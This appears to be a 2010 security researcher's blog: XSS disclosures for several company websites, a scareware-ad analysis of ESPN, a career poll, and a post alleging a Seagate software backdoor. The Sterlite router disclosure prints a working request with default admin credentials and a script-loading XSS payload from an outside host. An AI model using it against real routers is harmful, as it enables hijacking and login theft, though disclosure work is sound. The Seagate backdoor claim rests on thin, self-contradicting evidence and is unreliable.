Friday, April 2, 2010

Backdoor in Seagate..

Yesterday, on March 02, 2010, when I started Seagate Backup Manager from my desktop I had no freakin idea that my AV alerts n HIPS logs are going to scream their lungs out.

I've a 320 gb portable, a 500 gb external n another 500 gb external backup drives. I had the 320 gb plugged in. Upon starting the backup manager, the system came to a disturbingly slow run. A 100% CPU hog started. Ofcourse, at that time, I thought it appeared to be due to the 2 VMs running on my box. Since that hadn't occurred even when I work on my VM lab - around 6 workstation VMs n 2 server VMs - something didn't look right. So I checked & found there is this known bug / behavior with Seagate Backup Manager. Ok, so rebooted the box and started up again with what I had been doing earlier.

And then the AV alert pop ups suddenly seem to go berserk. McAfee AV started detecting n deleting / cleaning up exploits, trojans  n the alerts stood there on the screen.

Here's a portion of alerts screens I captured:


So I decided to check HIPS logs as well. I found there were several continuous attempts to access outlook files and address books, primarily. All were denied, of course.

Here's some of the screens from my box's HIPS logs:

As you can see above, the exploits do not seem specific to windows. There are generic trojans, backdoors, and linux exploits as well. The hips logs also suggest a behavior of a typical trojan / virus attempting to access email program files n address book.

I checked for any outbound connections when I started this app again later . There were no suspicious destinations at all. It appears to me this is kind of a scheduled activity build inside the application. I recall using this app post lunch hours and nothing had came up then.

In my opinion, this is what might have happened when I started the Seagate backup manager:

1. Application gets started, calls 'home'
2. Receives exploits / trojans / virus / backdoor etc.
3. Executes them

After recent Energizer backdoor disclosure, it had been speculated that backdoor was actually being an administrative function for developers. Now looking at yesterday's incident, with another widely used brand, I find the these behaviors could very well be more than just speculations or errors from developers.

It may not be incorrect to consider these incidents as calculated and planned attack vectors. Today when even big corporations are consistently receiving security advisories, then it is impractical to believe the HDD vendors are secure. Compromise of their server(s), responsible for pushing product updates on to the end-clients, can cover a broad target surface for an attacker(s) over a short period of time.

As long as vendors are not held accountable, I believe we cannot expect them to respond proactively. And till then, it remains the responsibility of the Information Security pupils to find the holes n get them fixed, as has been since long.

Please feel free to share your experience and thoughts over this finding / incident.

Best Regards..

Tuesday, March 23, 2010

Capgemini CTO Blog Cross-Site Scripting (XSS)


+++About Capgemini+++
A global leader in consulting, technology, outsourcing, and local professional services (http://www.capgemini.com/about/)

+++Affected URL(s)+++
http://www.capgemini.com/ctoblog/search_blog.php

+++Vulnerable Parameter / Function+++
'Search'

+++PoC+++



Capgemini Ist Notified: February 18, 2010
Capgemini IInd Notification: March 02, 2010
Response Received: March 02, 2010
Detailed Info Emailed: March 03, 2010
Current Status: Fixed (As of today, March 23, 2010)

Thanks to Richard Fahey @capgemini for his quick response on resolving this issue.

Best Regards.

Monday, March 1, 2010

TVS Star City Cross-Site Scripting (XSS)

+++About TVS Automobiles+++
A Leading automobile company with popular products as TVS Apache, Star City etc having operations in India.

+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.tvsstarcity.com/dealer-locator.asp?id=NEW%20DELHI

+++Vulnerable Parameter(s)+++
'id'

+++PoC+++



Best Regards.

Gulf Business Machines Cross-Site Scripting (XSS)

+++About GBM+++
Founded in 1990, Gulf Business Machines (GBM) is the leading IT solutions providers in the region fulfilling the IT requirements of local, regional and international organisations in the GCC.

A spin-off from IBM, GBM is the sole distributor for IBM 'excluding selected IBM products and services' throughout the GCC, except for Saudi Arabia.


+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.gbm4ibm.com/inside_networking_services.php?m=first
ttp://www.gbm4ibm.com/inside_productshowcase_cisco.php?m=fifth


and more ...

+++Vulnerable Parameter(s)+++
'm'


+++PoC+++







IBM first notified: February 18, 2010
Response: None till date
Public Disclosure: March 01, 2010


Best Regards.

Saturday, February 20, 2010

ESPN serving ads to scareware.


Going over ESPN online tonight, I came across this on 'http://games.espn.go.com/frontpage':



Considering this to be a one off random ad, I looked around the site. And these are few of several screens of what I found:




It became apparent these ads were present on majority of ESPN pages. It's your sponsored ad, I know ESPN, but what the heck!

I fired up Sandboxie and opened up this great PC fixer in my sandboxed browser.

 PC MightyMax home page greeted me with its great windows fixer

 I then downloaded what it offered and proceeded with installation.
 

 

 
As soon as installation completed, 2 processes were initiated - pcmm2010.exe and csc.exe.


And scary info popped up on my screen:

 



So my box needs to be fixed, as it says. Go ahead Max..


Moving forth with Buy option, a form appears asking for billing details, credit card information


Next screen needed my e-signature so I must give my date of birth; sure legit :P


Looking at page source during the transaction, it is seen some custom validation happens, I think, for confirming if the credit card, validity date, and cvv are hot or not.


Scroll down a bit and I see this:


After taking the credit card details and basically all PII necessary to make a transaction, a 'one-time' charge is deducted as well.

I've cleared off this mighty fixer from my sandbox. This rogue application - PC MightyMax 2010 - is an example of scareware. Scareware may also be utilized by spyware and / or malware.

From Wikipedia:

Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

In this scenario, the scareware gained the trust of an unsuspecting user browsing through a trusted site - ESPN - and through strategic placement and frequency of its ad throughout the site, got downloaded and installed on user's box.

Upon getting installed, it followed its basic routine of fake scanning and presenting scary results to make user go to its rogue site and proceed with purchase.

If we look at the cost associated with the purchase, it is damn expensive - $29.95 for 14 days + additional one-time charge. Apart from these up front cost, a user is giving away a good share of his/her personally identifiable information as well as credit card details.

From the perspective of one sitting at other end and controlling the rogue application, every installation is in good probability generating commission - the economy behind scarewares.

The process is known for last few years but the quality of scareware marketing campaigns are evolving. 

In essence, ESPN is the primary entity responsible to facilitate fraud in this instance. ESPN's adspace revenue has clearly overlooked the crucial step of verifying the adspace buyers and the kind of ads running on espn.go.com.

Let's see for how long this remains unnoticed.

Best Regards.

Saturday, February 6, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I reported XSS in Sterlite router on Feb 5, 2010.

Sterlite SAM300AX is used by broadband customers in Delhi and Mumbai, India. Given the customer base of MTNL in these 2 metro cities, this vulnerability may be extremely useful for an attacker and / or a bot herder looking for new bots.

After waiting for vendor response 2 weeks +, I decided to publish this to Full Disclosure/publicly.


Sharing the vuln POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Screenshots
 

 

Impact
Remote script / code execution, login theft n other nasty things.
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/

Sunday, January 10, 2010

Poll: Brand Value vs Role Relevance



Hi all,
We come across this choice at one or later point in our (experienced) professional lives:
Brand recognition of the organization OR Kind of role to perform.
Over the years, I have observed that the resources (people) don't give much consideration deciding on this. Most of those (I knew, personally and through others) gave preference to the 'brand name' before considering the 'role relevance'. The idea of gaining value on CV from the brand name of organization monopolies over the scope of learning, quality of work, & more importantly following one's passion. Of course, this is just my observation based on past few years and a HR person could better complement or debate it in present standings.


Nevertheless, I wanted to see what choice you may make. Hence this poll.
Would you rather stick to an organization who has a strong brand value but which offers you a mix of work responsibilities that may or may NOT be related to your core expertise?
OR
Would you go ahead with any decent organization which may not be as glamorous as the former but successfully gives you a definite, clearly-defined role in your core domain(s)?


What do I think? I believe in and pursue what I am passionate about. I prefer to do things who'd push me to learn stuff every day; be it reading new vulnerabilities, exploits or new papers on bot design. I love doing it & I learn along the way.


When we make our passion -> our work, success, money & every thing else will follow automatically. 


Therefore, though brand names are important, for such organizations have good processes, training opportunities, number of projects etc., if they do not offer roles facilitating one's career vision, they wouldn't matter much.


I will chose quality work over a 'role soup' any day. But that's just me :)


The poll is on the left-hand sidebar of this blog. Please participate in this poll & share your opinions though post comments. It would be great to know if the trend has changed in recent years...


Best Regards..